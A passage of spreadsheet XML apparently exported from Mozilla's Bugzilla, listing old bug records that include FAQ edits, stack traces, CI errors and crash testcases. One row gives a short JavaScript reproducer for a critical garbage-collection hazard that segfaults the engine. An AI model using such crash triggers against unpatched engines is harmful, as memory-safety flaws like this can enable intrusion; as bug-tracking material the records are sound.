      <c r="P1458" t="inlineStr"/>
      <c r="Q1458" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1458" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1458" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1458" t="n">
        <v>1</v>
      </c>
      <c r="U1458" t="n">
        <v>0</v>
      </c>
      <c r="V1458" t="n">
        <v>9</v>
      </c>
      <c r="W1458" t="inlineStr">
        <is>
          <t>A.1.3. Where can I get commercial support for Bugzilla?
  should make reference to http://www.buzilla.org/consulting.html
A.1.4 Who uses Bugzilla?
  remove AtHome... they don't exist anymore, I think :)
A.1.5 Who maintains Bugzilla?
  my address is now justdave@netscape.com :)
A.1.8 Why MySQL?
  support for both Postgres and Sybase is planned for 2.18.
A.2.3 multiple products
  the 55 group limit is gone.  It's now only limited to the number of unique
keys available in the database (smallint, or about 32 thousand)
A.2.5 attachment types
  Bugzilla will now autodetect the attachment mime-type based on what your web
browser thinks the file is when you upload it.
A.2.7 reporting
  The reporting system just got a complete overhaul.  I'm not sure what to
change here, but I know it can do a lot more than it used to.
A.2.11 import/export
  buglist.cgi now allows output in both RDF and CSV formats (CSV can be imported
into Excel).  There is a link at the bottom of the page for redisplaying the
page in CSV format.  For RDF you need to add &amp;ctype=rdf on the end of the URL
(RDF is intended to only be machine readable, so it's assuming a program would
be accessing that URL)
  The report system now allows CSV output of several of the reports, as well.
A.2.12 translated/localized versions
  The answer to this is now Yes.  An up-to-date list of the known translations
can always be found at http://www.bugzilla.org/download.html in the "Localized
templates" section.
A.2.13 Can the user create and save reports...
  Yes. No.  Yes (sort of - CSV format can be read by Excel)
A.4.2 Need bugzilla to only send mail to me
  The name of the param is "newchangedmail"
A.5.1 Bugzilla with Oracle?
  RedHat Bugzilla has been updated to 2.17.1 and supports Postgres, not Oracle.
RedHat no longer supports the Oracle version.  Their Postgres code will be
getting merged with mozilla.org Bugzilla (so it will support both MySQL and
Postgres) within the next month.  The work we are doing towards getting Bugzilla
to work with Postgres and Sybase should make it much easier for someone else to
port it to Oracle later if they wanted to.
A.5.3 Modifying the database
  the "mysql" command-line shell is a bit easier to use than running everything
through mysqladmin.  Might not hurt to mention that instead.  There are various
GUI MySQL admin programs floating around now, too.  You can find several of them
for Windows and Mac by searching for "mysql" on versiontracker.com
A.5.4 Password error in mysql 3.23.(29/30)
  This entry is obsolete.  Bugzilla a) now requires a newer version of MySQL
than that, and b) no longer uses MySQL's crypt() function anyway (uses Perl's
instead)
A.5.5 Can't connect to MySQL
  You should add to this that if this solves their problem then they need to
redo their permissions for the user Bugzilla is connecting as within MySQL.
A.7.5 attachment names are .cgi
  In 2.17.1 you can now edit the filename, and filenames are suggested when you
download the attachment.
That's it for now...  :)</t>
        </is>
      </c>
      <c r="X1458" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" t="n">
        <v>356378</v>
      </c>
      <c r="B1459" t="inlineStr">
        <is>
          <t>2006-10-11 23:49:42 -0700</t>
        </is>
      </c>
      <c r="C1459" t="inlineStr">
        <is>
          <t>"invalid getter usage" or assertion failure with "var x; x getter= function () { };"</t>
        </is>
      </c>
      <c r="D1459" t="inlineStr">
        <is>
          <t>2008-08-16 04:00:42 -0700</t>
        </is>
      </c>
      <c r="E1459" t="n">
        <v>1</v>
      </c>
      <c r="F1459" t="n">
        <v>1</v>
      </c>
      <c r="G1459" t="n">
        <v>3</v>
      </c>
      <c r="H1459" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1459" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1459" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1459" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1459" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1459" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1459" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1459" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1459" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T1459" t="n">
        <v>1</v>
      </c>
      <c r="U1459" t="n">
        <v>0</v>
      </c>
      <c r="V1459" t="n">
        <v>40</v>
      </c>
      <c r="W1459" t="inlineStr">
        <is>
          <t>js&gt; (function() { var x; x getter= function () { }; })()
Opt: 
  typein:1: SyntaxError: invalid getter usage
  (Why?)
Debug: 
  Assertion failure: 0, at jsinterp.c:5128</t>
        </is>
      </c>
      <c r="X1459" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" t="n">
        <v>732870</v>
      </c>
      <c r="B1460" t="inlineStr">
        <is>
          <t>2012-03-04 18:50:03 -0800</t>
        </is>
      </c>
      <c r="C1460" t="inlineStr">
        <is>
          <t>"ASSERTION: Weird scope returned" with document.write twice, dataset, adoptNode</t>
        </is>
      </c>
      <c r="D1460" t="inlineStr">
        <is>
          <t>2012-10-21 22:17:44 -0700</t>
        </is>
      </c>
      <c r="E1460" t="n">
        <v>1</v>
      </c>
      <c r="F1460" t="n">
        <v>1</v>
      </c>
      <c r="G1460" t="n">
        <v>3</v>
      </c>
      <c r="H1460" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1460" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1460" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1460" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1460" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1460" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1460" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1460" t="inlineStr">
        <is>
          <t>[fuzzblocker:compartment-mismatch][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1460" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1460" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1460" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T1460" t="n">
        <v>1</v>
      </c>
      <c r="U1460" t="n">
        <v>0</v>
      </c>
      <c r="V1460" t="n">
        <v>23</v>
      </c>
      <c r="W1460" t="inlineStr">
        <is>
          <t>Created attachment 602792
testcase
###!!! ASSERTION: Weird scope returned: 'betterScope == newScope', file js/xpconnect/src/nsXPConnect.cpp, line 1771
(Previous episodes: bug 716383, bug 731471.)</t>
        </is>
      </c>
      <c r="X1460" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" t="n">
        <v>418128</v>
      </c>
      <c r="B1461" t="inlineStr">
        <is>
          <t>2008-02-17 13:33:15 -0800</t>
        </is>
      </c>
      <c r="C1461" t="inlineStr">
        <is>
          <t>Yet another GC hazard with ++/-- in js_Interpret</t>
        </is>
      </c>
      <c r="D1461" t="inlineStr">
        <is>
          <t>2008-07-03 07:29:36 -0700</t>
        </is>
      </c>
      <c r="E1461" t="n">
        <v>1</v>
      </c>
      <c r="F1461" t="n">
        <v>1</v>
      </c>
      <c r="G1461" t="n">
        <v>3</v>
      </c>
      <c r="H1461" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1461" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1461" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1461" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1461" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1461" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1461" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1461" t="inlineStr">
        <is>
          <t>[sg:critical?] trunk fixed in bug 418641</t>
        </is>
      </c>
      <c r="Q1461" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1461" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1461" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T1461" t="n">
        <v>1</v>
      </c>
      <c r="U1461" t="n">
        <v>0</v>
      </c>
      <c r="V1461" t="n">
        <v>35</v>
      </c>
      <c r="W1461" t="inlineStr">
        <is>
          <t>The current implementation of ++ and -- operators in js_Interpret to increase/decrease indexed property of an object does not root the id of the property. This leads to a GC hazard when code tries to save the result back into object as the following example demonstrates:
~/m/ff/mozilla/js/src $ cat ~/m/y.js
var obj = {};
var id = { toString: function() { return ""+Math.pow(2, 0.1); } }
obj[id] = { valueOf: unrooter };
print(obj[id]++);
gc();
print(uneval(obj));
function unrooter()
{
    delete obj[id];
    gc();
    return 10;
}
~/m/ff/mozilla/js/src $ ~/m/ff/mozilla/js/src/Linux_All_OPT.OBJ/js ~/m/y.js
before 16384, after 16384, break 09ffc000
10
before 16384, after 16384, break 09ffc000
segmentation fault</t>
        </is>
      </c>
      <c r="X1461" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" t="n">
        <v>26241</v>
      </c>
      <c r="B1462" t="inlineStr">
        <is>
          <t>2000-02-02 10:03:36 -0800</t>
        </is>
      </c>
      <c r="C1462" t="inlineStr">
        <is>
          <t>Crash in JS when running table regression tests</t>
        </is>
      </c>
      <c r="D1462" t="inlineStr">
        <is>
          <t>2002-01-18 00:39:55 -0800</t>
        </is>
      </c>
      <c r="E1462" t="n">
        <v>1</v>
      </c>
      <c r="F1462" t="n">
        <v>1</v>
      </c>
      <c r="G1462" t="n">
        <v>3</v>
      </c>
      <c r="H1462" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1462" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1462" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1462" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1462" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1462" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1462" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1462" t="inlineStr">
        <is>
          <t>[pdt+]</t>
        </is>
      </c>
      <c r="Q1462" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1462" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1462" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T1462" t="n">
        <v>1</v>
      </c>
      <c r="U1462" t="n">
        <v>0</v>
      </c>
      <c r="V1462" t="n">
        <v>6</v>
      </c>
      <c r="W1462" t="inlineStr">
        <is>
          <t>The url and others in that directory result in the following stack. This is a 
recent regression. The easiest way to get the crash is using Viewer.
nsQueryInterface::operator()(const nsID &amp; {...}, void * * 0x0012ce4c) line 31 + 
23 bytes
nsCOMPtr&lt;nsIScriptObjectOwner&gt;::assign_from_helper(const nsCOMPtr_helper &amp; 
{...}, const nsID &amp; {...}) line 795 + 18 bytes
nsCOMPtr&lt;nsIScriptObjectOwner&gt;::nsCOMPtr&lt;nsIScriptObjectOwner&gt;(const 
nsQueryInterface &amp; {...}) line 508
nsJSUtils::nsConvertObjectToJSVal(nsISupports * 0x00be2a70, JSContext * 
0x01e388c0, JSObject * 0x00dbf340, long * 0x0012d6c4) line 259
GetHTMLCollectionProperty(JSContext * 0x01e388c0, JSObject * 0x00dbf340, long 
13584820, long * 0x0012d6c4) line 128 + 24 bytes
js_GetProperty(JSContext * 0x01e388c0, JSObject * 0x00dbf340, long 36117072, 
long * 0x0012d6c4) line 1869 + 125 bytes
js_Interpret(JSContext * 0x01e388c0, long * 0x0012d854) line 2218 + 1057 bytes
js_Invoke(JSContext * 0x01e388c0, unsigned int 2, unsigned int 0) line 682 + 13 
bytes
js_Interpret(JSContext * 0x01e388c0, long * 0x0012e08c) line 2262 + 15 bytes
js_Invoke(JSContext * 0x01e388c0, unsigned int 2, unsigned int 0) line 682 + 13 
bytes
js_Interpret(JSContext * 0x01e388c0, long * 0x0012e8c4) line 2262 + 15 bytes
js_Invoke(JSContext * 0x01e388c0, unsigned int 0, unsigned int 0) line 682 + 13 
bytes
js_Interpret(JSContext * 0x01e388c0, long * 0x0012f0fc) line 2262 + 15 bytes
js_Invoke(JSContext * 0x01e388c0, unsigned int 1, unsigned int 2) line 682 + 13 
bytes
js_InternalInvoke(JSContext * 0x01e388c0, JSObject * 0x00cf3560, long 14412784, 
unsigned int 0, unsigned int 1, long * 0x0012f284, long * 0x0012f230) line 759 + 
19 bytes
JS_CallFunctionValue(JSContext * 0x01e388c0, JSObject * 0x00cf3560, long 
14412784, unsigned int 1, long * 0x0012f284, long * 0x0012f230) line 2772 + 31 
bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x01e38df0, void * 0x00cf3560, 
void * 0x00dbebf0, unsigned int 1, void * 0x0012f284, int * 0x0012f280) line 562 
+ 33 bytes
nsJSEventListener::HandleEvent(nsIDOMEvent * 0x01e66154) line 128 + 57 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x0229bcf0, 
nsIDOMEvent * 0x01e66154, unsigned int 1) line 677 + 19 bytes
nsEventListenerManager::HandleEvent(nsIPresContext * 0x0229dc30, nsEvent * 
0x0012fd24, nsIDOMEvent * * 0x0012f680, unsigned int 7, nsEventStatus * 
0x0012fd64) line 1228 + 31 bytes
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x01e35ea4, 
nsIPresContext * 0x0229dc30, nsEvent * 0x0012fd24, nsIDOMEvent * * 0x0012f680, 
unsigned int 1, nsEventStatus * 0x0012fd64) line 3331
nsWebShell::OnEndDocumentLoad(nsWebShell * const 0x014d3ed0, nsIDocumentLoader * 
0x014d5680, nsIChannel * 0x0229a730, unsigned int 0) line 3156 + 34 bytes
nsDocLoaderImpl::FireOnEndDocumentLoad(nsDocLoaderImpl * 0x014d5680, nsIChannel 
* 0x0229a730, unsigned int 0) line 603
nsDocLoaderImpl::DocLoaderIsEmpty(unsigned int 0) line 494
nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x014d5684, nsIChannel * 
0x02287e60, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 
0x00000000) line 438
nsLoadGroup::RemoveChannel(nsLoadGroup * const 0x014d5800, nsIChannel * 
0x02287e60, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 
0x00000000) line 535 + 42 bytes
nsFileChannel::OnStopRequest(nsFileChannel * const 0x02287e64, nsIChannel * 
0x02282ae0, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 
0x00000000) line 455
nsOnStopRequestEvent::HandleEvent(nsOnStopRequestEvent * const 0x022849f0) line 
279
nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x022849a0) line 93 + 12 bytes
PL_HandleEvent(PLEvent * 0x022849a0) line 526 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00c8ec30) line 487 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x0148061e, unsigned int 49301, unsigned int 0, 
long 13167664) line 975 + 9 bytes
USER32! DispatchMessageWorker@8 + 135 bytes
USER32! DispatchMessageA@4 + 11 bytes
nsNativeViewerApp::Run() line 84
main(int 1, char * * 0x00be1870) line 157 + 11 bytes
mainCRTStartup() line 338 + 17 bytes</t>
        </is>
      </c>
      <c r="X1462" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" t="n">
        <v>295375</v>
      </c>
      <c r="B1463" t="inlineStr">
        <is>
          <t>2005-05-24 11:36:35 -0700</t>
        </is>
      </c>
      <c r="C1463" t="inlineStr">
        <is>
          <t>Random crash (can't figure out how to reproduce)</t>
        </is>
      </c>
      <c r="D1463" t="inlineStr">
        <is>
          <t>2005-05-25 05:48:29 -0700</t>
        </is>
      </c>
      <c r="E1463" t="n">
        <v>1</v>
      </c>
      <c r="F1463" t="n">
        <v>1</v>
      </c>
      <c r="G1463" t="n">
        <v>6</v>
      </c>
      <c r="H1463" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1463" t="inlineStr">
        <is>
          <t>Camino Graveyard</t>
        </is>
      </c>
      <c r="J1463" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1463" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1463" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1463" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1463" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1463" t="inlineStr"/>
      <c r="Q1463" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1463" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1463" t="inlineStr">
        <is>
          <t>Camino0.9</t>
        </is>
      </c>
      <c r="T1463" t="n">
        <v>1</v>
      </c>
      <c r="U1463" t="n">
        <v>0</v>
      </c>
      <c r="V1463" t="n">
        <v>6</v>
      </c>
      <c r="W1463" t="inlineStr">
        <is>
          <t>I'm seeing Camino crash. I have not yet foudna  way to reprodcue it.
Talkback ID TB6092900X. Crash log coming up.</t>
        </is>
      </c>
      <c r="X1463" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" t="n">
        <v>1616845</v>
      </c>
      <c r="B1464" t="inlineStr">
        <is>
          <t>2020-02-20 06:14:12 -0800</t>
        </is>
      </c>
      <c r="C1464" t="inlineStr">
        <is>
          <t>Near-perma "OSError: symbolic link privilege not held" in fetch-content</t>
        </is>
      </c>
      <c r="D1464" t="inlineStr">
        <is>
          <t>2020-10-06 05:28:14 -0700</t>
        </is>
      </c>
      <c r="E1464" t="n">
        <v>1</v>
      </c>
      <c r="F1464" t="n">
        <v>1</v>
      </c>
      <c r="G1464" t="n">
        <v>5</v>
      </c>
      <c r="H1464" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1464" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J1464" t="inlineStr">
        <is>
          <t>RelOps: Hardware</t>
        </is>
      </c>
      <c r="K1464" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1464" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1464" t="inlineStr"/>
      <c r="Q1464" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1464" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1464" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1464" t="n">
        <v>1</v>
      </c>
      <c r="U1464" t="n">
        <v>0</v>
      </c>
      <c r="V1464" t="n">
        <v>33</v>
      </c>
      <c r="W1464" t="inlineStr">
        <is>
          <t>This is for an intermittent bug that has been popping up in Browsertime tests (I can't find it anywhere else). Here's the error log:
```
[fetches 2020-02-19T00:16:28.468Z]   inflating: ffmpeg-4.1.1-win64-static/README.txt  
[fetches 2020-02-19T00:16:28.468Z]   inflating: ffmpeg-4.1.1-win64-static/LICENSE.txt  
[fetches 2020-02-19T00:16:28.469Z]    creating: ffmpeg-4.1.1-win64-static/presets/
[fetches 2020-02-19T00:16:28.469Z]   inflating: ffmpeg-4.1.1-win64-static/presets/libvpx-1080p50_60.ffpreset  
[fetches 2020-02-19T00:16:28.470Z]   inflating: ffmpeg-4.1.1-win64-static/presets/ffprobe.xsd  
[fetches 2020-02-19T00:16:28.471Z]   inflating: ffmpeg-4.1.1-win64-static/presets/libvpx-720p.ffpreset  
[fetches 2020-02-19T00:16:28.471Z]   inflating: ffmpeg-4.1.1-win64-static/presets/libvpx-360p.ffpreset  
[fetches 2020-02-19T00:16:28.472Z]   inflating: ffmpeg-4.1.1-win64-static/presets/libvpx-1080p.ffpreset  
[fetches 2020-02-19T00:16:28.472Z]   inflating: ffmpeg-4.1.1-win64-static/presets/libvpx-720p50_60.ffpreset  
[fetches 2020-02-19T00:16:28.474Z] C:\Users\task_1582070133\fetches\ffmpeg-4.1.1-win64-static.zip extracted in 1.605s
[fetches 2020-02-19T00:16:28.474Z] Removing C:\Users\task_1582070133\fetches\ffmpeg-4.1.1-win64-static.zip
[fetches 2020-02-19T00:16:31.007Z] C:\Users\task_1582070133\fetches\node.tar.bz2 extracted in 5.397s
[fetches 2020-02-19T00:16:31.009Z] Removing C:\Users\task_1582070133\fetches\node.tar.bz2
[fetches 2020-02-19T00:16:31.011Z] Traceback (most recent call last):
[fetches 2020-02-19T00:16:31.011Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2210, in makelink
[fetches 2020-02-19T00:16:31.012Z]     os.symlink(tarinfo.linkname, targetpath)
[fetches 2020-02-19T00:16:31.012Z] OSError: symbolic link privilege not held
[fetches 2020-02-19T00:16:31.012Z] 
[fetches 2020-02-19T00:16:31.012Z] During handling of the above exception, another exception occurred:
[fetches 2020-02-19T00:16:31.012Z] 
[fetches 2020-02-19T00:16:31.012Z] Traceback (most recent call last):
[fetches 2020-02-19T00:16:31.012Z]   File "fetch-content", line 663, in &lt;module&gt;
[fetches 2020-02-19T00:16:31.013Z]     sys.exit(main())
[fetches 2020-02-19T00:16:31.013Z]   File "fetch-content", line 659, in main
[fetches 2020-02-19T00:16:31.013Z]     return args.func(args)
[fetches 2020-02-19T00:16:31.013Z]   File "fetch-content", line 606, in command_task_artifacts
[fetches 2020-02-19T00:16:31.013Z]     fetch_urls(downloads)
[fetches 2020-02-19T00:16:31.013Z]   File "fetch-content", line 482, in fetch_urls
[fetches 2020-02-19T00:16:31.013Z]     f.result()
[fetches 2020-02-19T00:16:31.013Z]   File "C:\mozilla-build\python3\lib\concurrent\futures\_base.py", line 432, in result
[fetches 2020-02-19T00:16:31.014Z]     return self.__get_result()
[fetches 2020-02-19T00:16:31.014Z]   File "C:\mozilla-build\python3\lib\concurrent\futures\_base.py", line 384, in __get_result
[fetches 2020-02-19T00:16:31.014Z]     raise self._exception
[fetches 2020-02-19T00:16:31.014Z]   File "C:\mozilla-build\python3\lib\concurrent\futures\thread.py", line 56, in run
[fetches 2020-02-19T00:16:31.015Z]     result = self.fn(*self.args, **self.kwargs)
[fetches 2020-02-19T00:16:31.015Z]   File "fetch-content", line 468, in fetch_and_extract
[fetches 2020-02-19T00:16:31.015Z]     extract_archive(dest_path, dest_dir, typ)
[fetches 2020-02-19T00:16:31.015Z]   File "fetch-content", line 329, in extract_archive
[fetches 2020-02-19T00:16:31.016Z]     tar.extractall(str(dest_dir))
[fetches 2020-02-19T00:16:31.016Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2008, in extractall
[fetches 2020-02-19T00:16:31.016Z]     numeric_owner=numeric_owner)
[fetches 2020-02-19T00:16:31.016Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2050, in extract
[fetches 2020-02-19T00:16:31.018Z]     numeric_owner=numeric_owner)
[fetches 2020-02-19T00:16:31.018Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2128, in _extract_member
[fetches 2020-02-19T00:16:31.018Z]     self.makelink(tarinfo, targetpath)
[fetches 2020-02-19T00:16:31.019Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2221, in makelink
[fetches 2020-02-19T00:16:31.019Z]     targetpath)
[fetches 2020-02-19T00:16:31.020Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2120, in _extract_member
[fetches 2020-02-19T00:16:31.020Z]     self.makefile(tarinfo, targetpath)
[fetches 2020-02-19T00:16:31.020Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 2159, in makefile
[fetches 2020-02-19T00:16:31.021Z]     source.seek(tarinfo.offset_data)
[fetches 2020-02-19T00:16:31.021Z]   File "C:\mozilla-build\python3\lib\tarfile.py", line 522, in seek
[fetches 2020-02-19T00:16:31.021Z]     raise StreamError("seeking backwards is not allowed")
[fetches 2020-02-19T00:16:31.021Z] tarfile.StreamError: seeking backwards is not allowed
[fetches 2020-02-19T00:16:31.045Z] removing C:/Users/task_1582070133/fetches
[fetches 2020-02-19T00:16:32.221Z] finished
[taskcluster 2020-02-19T00:16:32.236Z]    Exit Code: 1
```
The failure can be found here: https://treeherder.mozilla.org/#/jobs?repo=mozilla-central&amp;group_state=expanded&amp;tier=1%2C2%2C3&amp;searchStr=browsertime&amp;revision=df596657bebcb96b917d75ff452316bbe8140a1a&amp;selectedJob=289436219</t>
        </is>
      </c>
      <c r="X1464" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" t="n">
        <v>1537623</v>
      </c>
      <c r="B1465" t="inlineStr">
        <is>
          <t>2019-03-20 17:02:01 -0700</t>
        </is>
      </c>
      <c r="C1465" t="inlineStr">
        <is>
          <t>Taskcluster issues</t>
        </is>
      </c>
      <c r="D1465" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E1465" t="n">
        <v>1</v>
      </c>
      <c r="F1465" t="n">
        <v>1</v>
      </c>
      <c r="G1465" t="n">
        <v>6</v>
      </c>
      <c r="H1465" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1465" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J1465" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K1465" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1465" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1465" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1465" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1465" t="inlineStr"/>
      <c r="Q1465" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1465" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1465" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1465" t="n">
        <v>1</v>
      </c>
      <c r="U1465" t="n">
        <v>0</v>
      </c>
      <c r="V1465" t="n">
        <v>2</v>
      </c>
      <c r="W1465" t="inlineStr">
        <is>
          <t>All the trees were closed as there were some task cluster issues.</t>
        </is>
      </c>
      <c r="X1465" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" t="n">
        <v>552110</v>
      </c>
      <c r="B1466" t="inlineStr">
        <is>
          <t>2010-03-12 16:20:57 -0800</t>
        </is>
      </c>
      <c r="C1466" t="inlineStr">
        <is>
          <t>Use of deleted object by NodeIterator using NodeFilter which called detach (ZDI-CAN-712)</t>
        </is>
      </c>
      <c r="D1466" t="inlineStr">
        <is>
          <t>2010-08-10 11:35:30 -0700</t>
        </is>
      </c>
      <c r="E1466" t="n">
        <v>1</v>
      </c>
      <c r="F1466" t="n">
        <v>1</v>
      </c>
      <c r="G1466" t="n">
        <v>3</v>
      </c>
      <c r="H1466" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1466" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1466" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1466" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1466" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1466" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1466" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1466" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1466" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1466" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1466" t="inlineStr">
        <is>
